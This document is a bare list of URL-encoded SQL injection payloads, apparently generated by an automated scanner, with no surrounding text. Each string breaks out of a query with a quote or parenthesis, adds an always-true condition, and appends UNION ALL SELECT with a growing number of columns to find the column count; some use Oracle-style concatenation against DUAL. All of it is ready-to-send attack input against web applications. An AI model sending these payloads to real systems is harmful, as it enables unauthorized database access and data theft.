-3851%27%29%20WHERE%205394%3D5394%20UNION%20ALL%20SELECT%205394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394--%20 -5813%27%29%20WHERE%202421%3D2421%20UNION%20ALL%20SELECT%202421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421%2C2421--%20 -9701%27%29%20WHERE%207912%3D7912%20UNION%20ALL%20SELECT%207912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912%2C7912--%20 -6011%27%29%20WHERE%206304%3D6304%20UNION%20ALL%20SELECT%206304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304%2C6304--%20 -7629%27%29%20WHERE%209231%3D9231%20UNION%20ALL%20SELECT%209231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231--%20 -6422%27%29%20WHERE%202026%3D2026%20UNION%20ALL%20SELECT%202026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026--%20 -4914%27%29%20WHERE%201077%3D1077%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077--%20 -7599%27%29%20WHERE%202893%3D2893%20UNION%20ALL%20SELECT%202893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893%2C2893--%20 -3931%22%29%20WHERE%205456%3D5456%20UNION%20ALL%20SELECT%205456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456--%20 -6554%22%29%20WHERE%203322%3D3322%20UNION%20ALL%20SELECT%203322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322--%20 -9648%22%29%20WHERE%207193%3D7193%20UNION%20ALL%20SELECT%207193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193%2C7193--%20 -8594%22%29%20WHERE%202399%3D2399%20UNION%20ALL%20SELECT%202399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399%2C2399--%20 -5509%22%29%20WHERE%201654%3D1654%20UNION%20ALL%20SELECT%201654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654--%20 -3624%22%29%20WHERE%206670%3D6670%20UNION%20ALL%20SELECT%206670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670--%20 -1057%22%29%20WHERE%209913%3D9913%20UNION%20ALL%20SELECT%209913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913%2C9913--%20 -3529%22%29%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%206305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305--%20 -9866%22%29%20WHERE%203574%3D3574%20UNION%20ALL%20SELECT%203574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574%2C3574--%20 -4885%22%29%20WHERE%204692%3D4692%20UNION%20ALL%20SELECT%204692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692%2C4692--%20 -5407%29%20WHERE%204013%3D4013%20UNION%20ALL%20SELECT%204013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013--%20 -6684%29%20WHERE%203453%3D3453%20UNION%20ALL%20SELECT%203453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453--%20 -4002%29%20WHERE%201324%3D1324%20UNION%20ALL%20SELECT%201324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324--%20 -3328%29%20WHERE%208372%3D8372%20UNION%20ALL%20SELECT%208372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372%2C8372--%20 -8054%29%20WHERE%204480%3D4480%20UNION%20ALL%20SELECT%204480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480--%20 -6850%29%20WHERE%204539%3D4539%20UNION%20ALL%20SELECT%204539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539--%20 -9775%29%20WHERE%202978%3D2978%20UNION%20ALL%20SELECT%202978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978--%20 -7134%29%20WHERE%206200%3D6200%20UNION%20ALL%20SELECT%206200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200%2C6200--%20 -8233%29%20WHERE%206592%3D6592%20UNION%20ALL%20SELECT%206592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592--%20 -1621%29%20WHERE%208887%3D8887%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887--%20 -6539%27%20WHERE%205230%3D5230%20UNION%20ALL%20SELECT%205230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230--%20 -2945%27%20WHERE%204181%3D4181%20UNION%20ALL%20SELECT%204181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181--%20 -8329%27%20WHERE%201114%3D1114%20UNION%20ALL%20SELECT%201114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114--%20 -6475%27%20WHERE%207893%3D7893%20UNION%20ALL%20SELECT%207893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893%2C7893--%20 -9205%27%20WHERE%209626%3D9626%20UNION%20ALL%20SELECT%209626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626%2C9626--%20 -6063%27%20WHERE%203321%3D3321%20UNION%20ALL%20SELECT%203321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321%2C3321--%20 -7880%27%20WHERE%202722%3D2722%20UNION%20ALL%20SELECT%202722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722--%20 -1998%27%20WHERE%206150%3D6150%20UNION%20ALL%20SELECT%206150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150--%20 -2914%27%20WHERE%209916%3D9916%20UNION%20ALL%20SELECT%209916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916%2C9916--%20 -6121%27%20WHERE%204749%3D4749%20UNION%20ALL%20SELECT%204749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749--%20 -8037%22%20WHERE%203464%3D3464%20UNION%20ALL%20SELECT%203464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464%2C3464--%20 -5102%22%20WHERE%203117%3D3117%20UNION%20ALL%20SELECT%203117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117%2C3117--%20 -7652%22%20WHERE%206592%3D6592%20UNION%20ALL%20SELECT%206592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592%2C6592--%20 -5199%22%20WHERE%202008%3D2008%20UNION%20ALL%20SELECT%202008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008--%20 -1699%22%20WHERE%204013%3D4013%20UNION%20ALL%20SELECT%204013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013%2C4013--%20 -7594%22%20WHERE%203375%3D3375%20UNION%20ALL%20SELECT%203375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375%2C3375--%20 -8151%22%20WHERE%207665%3D7665%20UNION%20ALL%20SELECT%207665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665%2C7665--%20 -6445%22%20WHERE%202552%3D2552%20UNION%20ALL%20SELECT%202552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552%2C2552--%20 -6501%22%20WHERE%206679%3D6679%20UNION%20ALL%20SELECT%206679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679--%20 -7660%22%20WHERE%201094%3D1094%20UNION%20ALL%20SELECT%201094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094%2C1094--%20 -5901%20WHERE%206101%3D6101%20UNION%20ALL%20SELECT%206101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101%2C6101--%20 -4335%20WHERE%206414%3D6414%20UNION%20ALL%20SELECT%206414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414%2C6414--%20 -8624%20WHERE%209966%3D9966%20UNION%20ALL%20SELECT%209966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966%2C9966--%20 -9906%20WHERE%204592%3D4592%20UNION%20ALL%20SELECT%204592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592%2C4592--%20 -5610%20WHERE%204079%3D4079%20UNION%20ALL%20SELECT%204079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079%2C4079--%20 -8523%20WHERE%201127%3D1127%20UNION%20ALL%20SELECT%201127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127--%20 -8256%20WHERE%209480%3D9480%20UNION%20ALL%20SELECT%209480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480%2C9480--%20 -4745%20WHERE%209284%3D9284%20UNION%20ALL%20SELECT%209284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284--%20 -8041%20WHERE%202472%3D2472%20UNION%20ALL%20SELECT%202472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472--%20 -4115%20WHERE%204334%3D4334%20UNION%20ALL%20SELECT%204334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334--%20 -3234%27%7C%7C%28SELECT%20%27cDxN%27%20FROM%20DUAL%20WHERE%201132%3D1132%20UNION%20ALL%20SELECT%201132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132%2C1132--%20 -4303%27%7C%7C%28SELECT%20%27avuI%27%20FROM%20DUAL%20WHERE%203963%3D3963%20UNION%20ALL%20SELECT%203963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963%2C3963--%20 -9598%27%7C%7C%28SELECT%20%27Qkvt%27%20FROM%20DUAL%20WHERE%202338%3D2338%20UNION%20ALL%20SELECT%202338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338--%20 -6411%27%7C%7C%28SELECT%20%27RoAh%27%20FROM%20DUAL%20WHERE%205664%3D5664%20UNION%20ALL%20SELECT%205664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664%2C5664--%20 -6451%27%7C%7C%28SELECT%20%27OLol%27%20FROM%20DUAL%20WHERE%202912%3D2912%20UNION%20ALL%20SELECT%202912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912%2C2912--%20 -1032%27%7C%7C%28SELECT%20%27PeRc%27%20FROM%20DUAL%20WHERE%201185%3D1185%20UNION%20ALL%20SELECT%201185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185--%20 -6846%27%7C%7C%28SELECT%20%27UsVk%27%20FROM%20DUAL%20WHERE%202851%3D2851%20UNION%20ALL%20SELECT%202851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851%2C2851--%20 -4699%27%7C%7C%28SELECT%20%27emiK%27%20FROM%20DUAL%20WHERE%209272%3D9272%20UNION%20ALL%20SELECT%209272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272%2C9272--%20 -2926%27%7C%7C%28SELECT%20%27jusW%27%20FROM%20DUAL%20WHERE%208002%3D8002%20UNION%20ALL%20SELECT%208002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002%2C8002--%20 -6268%27%7C%7C%28SELECT%20%27JTYp%27%20FROM%20DUAL%20WHERE%206311%3D6311%20UNION%20ALL%20SELECT%206311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311%2C6311--%20 